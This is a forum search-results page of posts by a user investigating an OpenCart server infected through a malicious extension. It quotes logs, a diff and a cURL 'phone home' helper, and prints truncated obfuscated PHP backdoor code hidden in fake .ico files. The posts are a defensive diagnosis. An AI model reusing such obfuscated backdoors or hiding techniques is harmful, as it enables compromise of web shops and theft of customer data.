Search found 111 matches

Re: Ongoing Attack Stealing Credit Cards From Over A Hundred Shopping Sites

You must be on shared hosting if you have to ask, no thanks. Seems like a lot of wasted time, but if you're bored have at it!

  • Fri May 24, 2019 9:58 pm
  • Replies 6
  • Views 324
Re: 3.02_conf running and running...?

Ok, doesn't seem like the normal case though. My 2 cents would be that things like base64_decode or gzinflate or curl should be locked out by default for extensions. Someone should have to change a config file on the backend to enable some PHP functions for extensions to use, majority of them don't ...

  • Tue May 14, 2019 10:37 am
  • Replies 47
  • Views 1152
Re: 3.02_conf running and running...?

Is there any good reason for an extension to ever use base64_decode or gzinflate?
Because this could have been blocked at the front door if the extension installer had stopped the install as soon as it saw these in the code.

  • Mon May 13, 2019 8:04 pm
  • Replies 47
  • Views 1152
Re: 3.02_conf running and running...?

I already kicked up a whole new server on a different IP and installed OC on it many days ago. No worries there. And I had disabled SELinux on that server, didn't want to mess around configuring it since I am still unsure if I will move to OC anyway. It was all just a test server for me. I see now t...

  • Mon May 13, 2019 6:32 pm
  • Replies 47
  • Views 1152
Re: 3.02_conf running and running...?

"most of today's Badcode no longer hurts a well-done XP ;)" Too funny!

Hello, Detection is correct: HEUR:Trojan.Linux.Agent.go
Best regards, Alexander Al. Kolesnikov, Malware Analyst, Kaspersky Lab
---
https://www.google.com/search?q=HEUR%3ATrojan.Linux.Agent.go&ie=utf-8&oe=utf-8
---
So what does it do...

  • Mon May 13, 2019 8:50 am
  • Replies 47
  • Views 1152
Re: 3.02_conf running and running...?

IP_CAM wrote:
Mon May 13, 2019 4:32 am
File sent to Kaspersky Lab. (Name changed, to make passing my Firewall possible... ;) )
So you were hit with it too?

  • Mon May 13, 2019 4:47 am
  • Replies 47
  • Views 1152
Re: 3.02_conf running and running...?

Pretty sure I see what happened now. I have full backups of the server at random dates. I just took backups when I remembered, usually after I made progress with this OC install project. Ironically I seem to have caught this nasty script at the point where it was installed on the server through the ...

  • Mon May 13, 2019 4:11 am
  • Replies 47
  • Views 1152
Re: 3.02_conf running and running...?

And here's another hacked OpenCart that is not me; that's now 3 known with this. Original post: https://opencartforum.com/topic/136313-vzlomali-opencart/?do=getNewComment Translated: https://translate.google.com/translate?hl=en&sl=ru&u=https://opencartforum.com/topic/136313-vzlomali-opencart/%3Fdo%3D...

  • Sun May 12, 2019 7:13 pm
  • Replies 47
  • Views 1152
Re: 3.02_conf running and running...?

Staring at more logs - I see that the file upload extension must have been installed on April 4th because there are errors with the upload file formats noted in the OC log. Looking back at the apache logs, the first log isn't until April 7th which explains why I don't see the install of the extension.

  • Sun May 12, 2019 12:25 pm
  • Replies 47
  • Views 1152
Re: 3.02_conf running and running...?

All that call does is retrieve: "Welcome to the Export/Import Tool (V3.20) for OpenCart. If you need a customized version, <a href="http://www.mhccorp.com/index.php?route=information/contact"><u>let us know</u></a> and we can create one for a charge." I suspect you have a hosting security issue, not ...

  • Sun May 12, 2019 11:24 am
  • Replies 47
  • Views 1152
Re: 3.02_conf running and running...?

I did post a couple of encrypted files, but odd you call log files unreadable? Odd you call that last chunk of code I posted unreadable? And it was noted in a previous post that an extension shouldn't phone home, when here is clearly code phoning home.

  • Sun May 12, 2019 9:34 am
  • Replies 47
  • Views 1152
Re: 3.02_conf running and running...?

And I am looking at the install zip, here is something interesting --

[code]
// Helper found in the extension's install zip: fetches an arbitrary URL with cURL
// and hands the response body back to the caller (this is the "phoning home" code).
protected function curl_get_contents($url) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_HEADER, 0);          // drop response headers
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);  // return body instead of printing it
    $output = curl_exec($ch);
    curl_close($ch);
    return $output;
}
[/code]
...

  • Sat May 11, 2019 11:13 pm
  • Replies 47
  • Views 1152
Re: 3.02_conf running and running...?

Ok, now thinking back to the apache log I posted above. Because of the dates on the binary files, the extension would have to be from these apache logs -

193.169.87.26 - - [10/Apr/2019:15:39:47 +0000] "POST /admin/index.php?route=marketplace/installer/upload&user_token=f8NiIn6RVtualcsX1njyLhavDSqXW0...

  • Sat May 11, 2019 11:07 pm
  • Replies 47
  • Views 1152
Re: 3.02_conf running and running...?

So I took the new clean install, tar'd it, transferred it to the infected server, un-tar'd it and ran diff to see the difference. Taking out the thousands of images, I get this:

Only in html/admin: 3.02_conf
Files html/admin/config.php and clean/admin/config.php differ
Only in html/admin/controller/c...

  • Sat May 11, 2019 10:02 pm
  • Replies 47
  • Views 1152
Re: 3.02_conf running and running...?

[root@opencart system]# cat /var/www/html/system/xtnidjzx.php
<?php $bkrpkdl = '*glcxu7n#r8-\'29mtv64_isebyofkda13pH5';$rykhs = Array();$rykhs[] = $bkrpkdl[34].$bkrpkdl[0];$rykhs[] = $bkrpkdl[3].$bkrpkdl[10].$bkrpkdl[13].$bkrpkdl[32].$bkrpkdl[32].$bkrpkdl[18].$bkrpkdl[27].$bkrpkdl[10].$bkrpkdl[11]....

  • Sat May 11, 2019 9:19 pm
  • Replies 47
  • Views 1152
Re: 3.02_conf running and running...?

[root@opencart system]# cat .c2ea66bb.ico
<?php $_l8q09b = basename/*axn*/(/*iz*/trim/*x*/(/*m1*/preg_replace/*9gy*/(/*27sqp*/rawurldecode/*8zh10*/(/*y8*/"%2F%5C%28.%2A%24%2F"/*i7was*/)/*2mb3*/, '', __FILE__/*2*/)/*rfqn*//*4b3*/)/*y*//*ot*/)/*nzc*/;$_zinlrm = "G%05%12M%40RS%04%0B%40%0C%07G%09...

  • Sat May 11, 2019 9:18 pm
  • Replies 47
  • Views 1152
Re: 3.02_conf running and running...?

[root@opencart system]# cat .798c18ee.ico
<?php $_udfcv9j = basename/*j*/(/*rpq*/trim/*0k7*/(/*nr*/preg_replace/*veih*/(/*xu*/rawurldecode/*zl802*/(/*rwx2*/"%2F%5C%28.%2A%24%2F"/*7hibw*/)/*916*/, '', __FILE__/*jlo*/)/*n*//*i7p*/)/*1d*//*w*/)/*o9g*/;$_rla6c = "GQ%19%10BU%5D%03%0C%40%0C%07G%09DMJ%06P...

  • Sat May 11, 2019 9:18 pm
  • Replies 47
  • Views 1152
Re: 3.02_conf running and running...?

Well this is interesting...

[root@opencart system]# ls -lha /var/www/html/system
total 112K
drwxr-xr-x. 6 apache apache 223 May 10 19:37 .
drwxr-xr-x. 6 root   root   144 May  1 21:45 ..
-rw-r--r--  1 apache apache 30K Dec  3 01:01 .798c18ee.ico
-rw-r--r--  1 apache apache 33K Jan 14 02:45 .c2ea66bb.ico
drw...

  • Sat May 11, 2019 9:16 pm
  • Replies 47
  • Views 1152